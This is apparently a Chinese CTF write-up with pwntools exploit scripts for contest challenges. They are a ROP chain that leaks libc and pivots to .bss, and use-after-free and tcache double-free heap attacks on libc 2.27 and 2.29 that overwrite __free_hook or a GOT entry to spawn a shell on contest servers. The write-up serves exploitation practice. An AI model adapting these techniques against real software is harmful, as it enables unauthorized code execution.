安恒四月举办的一次月赛,赵师傅说是雨露均沾,应该算是吧
Test
花了点时间把ROP这个题补上,当时没做,把Taqini师傅的WP看了一下,草草的把exp补上了,exp最后是把栈迁移到了bss段上,以及用了ret令rsp对齐0x10
MAIN LIBC:2.27 EXP
1 | from pwn import* |
# Exploit for the "Test" challenge (libc 2.27): a two-stage ROP chain.
# Stage 1 leaks a libc pointer through read@got; stage 2 calls system("/bin/sh").
# The writeup above says the stack is pivoted onto .bss and a bare `ret` keeps
# rsp 16-byte aligned.  This is Python 2 pwntools code (`.next()`, str payloads).
# The 0x4000xx gadget addresses imply ./main is loaded at a fixed base (non-PIE);
# PIE or a stack canary would break this chain as written.
context.log_level ='DEBUG'
# NOTE: the local process handle is overwritten on the next line, so ./main is
# spawned and never used; comment one of the two out when switching targets.
p = process('./main')
p = remote('183.129.189.60',10039)
elf =ELF('./main')
libc =ELF('./libc-2.27.so')
# Hard-coded gadgets for this particular build of ./main (not derived from `elf`).
pop_rdi_ret = 0x400823
ret = 0x40055E
# First prompt takes a number; 0x100 presumably sets how much the next read accepts — TODO confirm.
p.sendlineafter('name: ',str(0x100))
# 0x80 bytes of filler, then a value inside .bss (presumably the saved-rbp slot,
# i.e. the stack pivot the writeup mentions), then `pop rdi; ret` with read@got,
# returning into 0x4006F3 — an address inside ./main that this page does not
# identify; the script expects it to print the pointer and prompt again.
payload ='\x00'*0x80 + p64(elf.bss() + 0x800) + p64(pop_rdi_ret) + p64(elf.got['read']) + p64(0x4006F3)
p.sendafter('name?',payload)
# Leak: take the 6 low bytes of the libc pointer (which ends in 0x7f), pad to 8,
# and subtract read's offset to get the libc base.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()
# NOTE(review): libc.address is never assigned in this script, so this logs the
# unrelocated value rather than the leaked base; `hex(libc_base)` is what was meant.
log.info('LIBC:\t' + hex(libc.address))
p.sendline(str(0x100))
# Stage 2: 0x88 bytes of filler, a lone `ret` to realign the stack to 16 bytes
# before the call, then system("/bin/sh") via `pop rdi; ret`.
p.sendlineafter('you name?','U'*0x88 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system))
p.interactive()
Sales_Office
就三个PWN题,一个简单的rop,两个堆,其实算一个堆吧,只是环境不一样而已,简单的UAF洞,2.29的脚本向前兼容2.27的,只要形成tcache dup或者fastbin dup即可
MAIN LIBC:2.27 EXP
1 | from pwn import* |
def new(size,content):
    """Menu option 1: allocate a "house" of `size` bytes and write `content` into it.

    `content` goes out with sendafter (no trailing newline) so it is delivered
    byte-exact.  Uses the module-level tube `p`, which is created after these
    helpers are defined.
    """
    p.sendlineafter('choice:','1')
    p.sendlineafter('house:',str(size))
    p.sendafter('your house:',content)
def show(index):
    """Menu option 3: ask the program to print the house at `index`.

    The output is not consumed here; the caller reads it from `p` after the
    'house:' banner.
    """
    p.sendlineafter('choice:','3')
    p.sendlineafter('index:',str(index))
def free(index):
    """Menu option 4: free the house at `index`.

    Per the writeup, the program keeps the stale entry after freeing (a
    use-after-free), which is what the calling script relies on.
    """
    p.sendlineafter('choice:','4')
    p.sendlineafter('index:',str(index))
# Exploit for "Sales_Office" on libc 2.27: a double free into tcache (2.27 has no
# double-free check on tcache entries), heap and libc leaks via show() on freed
# entries, then __free_hook -> system.  Python 2 pwntools (str payloads).
# NOTE: the local handle is overwritten immediately; ./main is spawned and left unused.
p = process('./main')
p = remote('183.129.189.60',10060)
elf =ELF('./main')
libc = ELF('./libc-2.27.so',checksec=False)
new(0x10,'FMYY') #0
new(0x10,'FMYY') #1
new(0x10,'FMYY') #2
new(0x10,'FMYY') #3

#---------
free(2)
# Double free of entry 0.  glibc 2.27's tcache accepts this (the `key` check
# that aborts on it arrived in 2.29), so the chunk is linked twice in its bin.
free(0)
free(0)
# show() on the freed entry prints the first 8 bytes of the chunk, i.e. its
# tcache `next` pointer, which points back into the heap; 0x260 is that chunk's
# offset from the heap base for this binary (build-specific).
show(0)
p.recvuntil('house:\n')
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x260
log.info('HEAP:\t'+ hex(heap_base))
# Tcache poisoning: the first new() is served the double-freed chunk and
# overwrites its `next` with heap_base + 0x2A0, so a later 0x10 allocation is
# handed out from that address.  The exact chunk/slot layout is not visible on
# this page; the intent is to get got['__libc_start_main'] into an entry that
# show(1) prints — confirm against the binary.
new(0x10,p64(heap_base + 0x2A0))
new(0x20,'FMYY')
new(0x10,p64(elf.got['__libc_start_main']))
show(1)
p.recvuntil('house:\n')
libc_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - libc.sym['__libc_start_main']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
#------------
# Second double free (entry 3), used the same way to point a tcache entry at
# __free_hook and write system there.
free(3)
free(3)
new(0x10,p64(free_hook))
new(0x20,'/bin/sh\x00')
new(0x10,p64(system))
# Index 8 is the entry allocated with "/bin/sh\x00" (assuming indices grow by
# one per new(), starting at 0 — confirm), so freeing it calls the hook with
# that string as its argument.
free(8)
p.interactive()
1 | from pwn import* |
def new(size,content):
    """Menu option 1: allocate a "house" of `size` bytes and write `content` into it.

    `content` goes out with sendafter (no trailing newline) so it is delivered
    byte-exact.  Uses the module-level tube `p`, which is created after these
    helpers are defined.
    """
    p.sendlineafter('choice:','1')
    p.sendlineafter('house:',str(size))
    p.sendafter('your house:',content)
def show(index):
    """Menu option 3: ask the program to print the house at `index`.

    The output is not consumed here; the caller reads it from `p` after the
    'house:' banner.
    """
    p.sendlineafter('choice:','3')
    p.sendlineafter('index:',str(index))
def free(index):
    """Menu option 4: free the house at `index`.

    Per the writeup, the program keeps the stale entry after freeing (a
    use-after-free), which is what the calling script relies on.
    """
    p.sendlineafter('choice:','4')
    p.sendlineafter('index:',str(index))
# Exploit for "Sales_Office" on libc 2.29.  No entry is freed twice here (2.29's
# tcache `key` check would abort on that); per the writeup the UAF alone is
# enough: freed entries can still be shown and their slots reused.
# Python 2 pwntools (str payloads).
# NOTE: the local handle is overwritten immediately; ./main is spawned and left unused.
p = process('./main')
p = remote('das.wetolink.com',28499)
elf =ELF('./main')
libc = ELF('./libc-2.29.so',checksec=False)
# Five 0x10-byte houses (#0-#4), each pre-filled with "/bin/sh\0".
for i in range(5):
    new(0x10,'/bin/sh\x00')
# Free #3, #2, #1, #0 in that order; all presumably land in the same tcache bin.
for i in range(3,-1,-1):
    free(i)
# Reuse a freed chunk and write got['__libc_start_main'] into its first 8 bytes;
# show(1) then prints a libc pointer through a stale entry.  The chunk/slot
# relationship that makes this work is not visible on this page — confirm.
new(0x10,p64(elf.got['__libc_start_main']))
show(1)
p.recvuntil('house:\n')
libc_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - libc.sym['__libc_start_main']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']  # unused below
system = libc_base + libc.sym['system']
rce = libc_base +0xe2383  # unused below; the offset is specific to this libc build
# Heap leak via a stale entry; 0x320 is this binary's offset from the heap base
# (build-specific).  heap_base is only logged and never used afterwards.
show(2)
p.recvuntil('house:\n')
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x320
log.info('HEAP:\t'+ hex(heap_base))
free(4)
free(5)
free(0)
# Drain the bin, then write got['atoi'] into a freed chunk's `next` pointer so a
# following 0x10 allocation is served from the GOT.  The 0x60 allocation in
# between presumably comes from a different bin.  (Intermediate layout not
# shown on this page — confirm against the binary.)
new(0x10,'FMYY')
new(0x10,'FMYY')
new(0x10,'FMYY')
new(0x10,p64(elf.got['atoi']))
new(0x60,'FMYY')
# Intended to land on atoi's GOT slot, so the menu's choice parser (presumably
# atoi) becomes system.
new(0x10,p64(system))
# The next "choice" is "/bin/sh", which the replaced atoi receives as its argument.
p.sendlineafter('choice:','/bin/sh\x00')
p.interactive()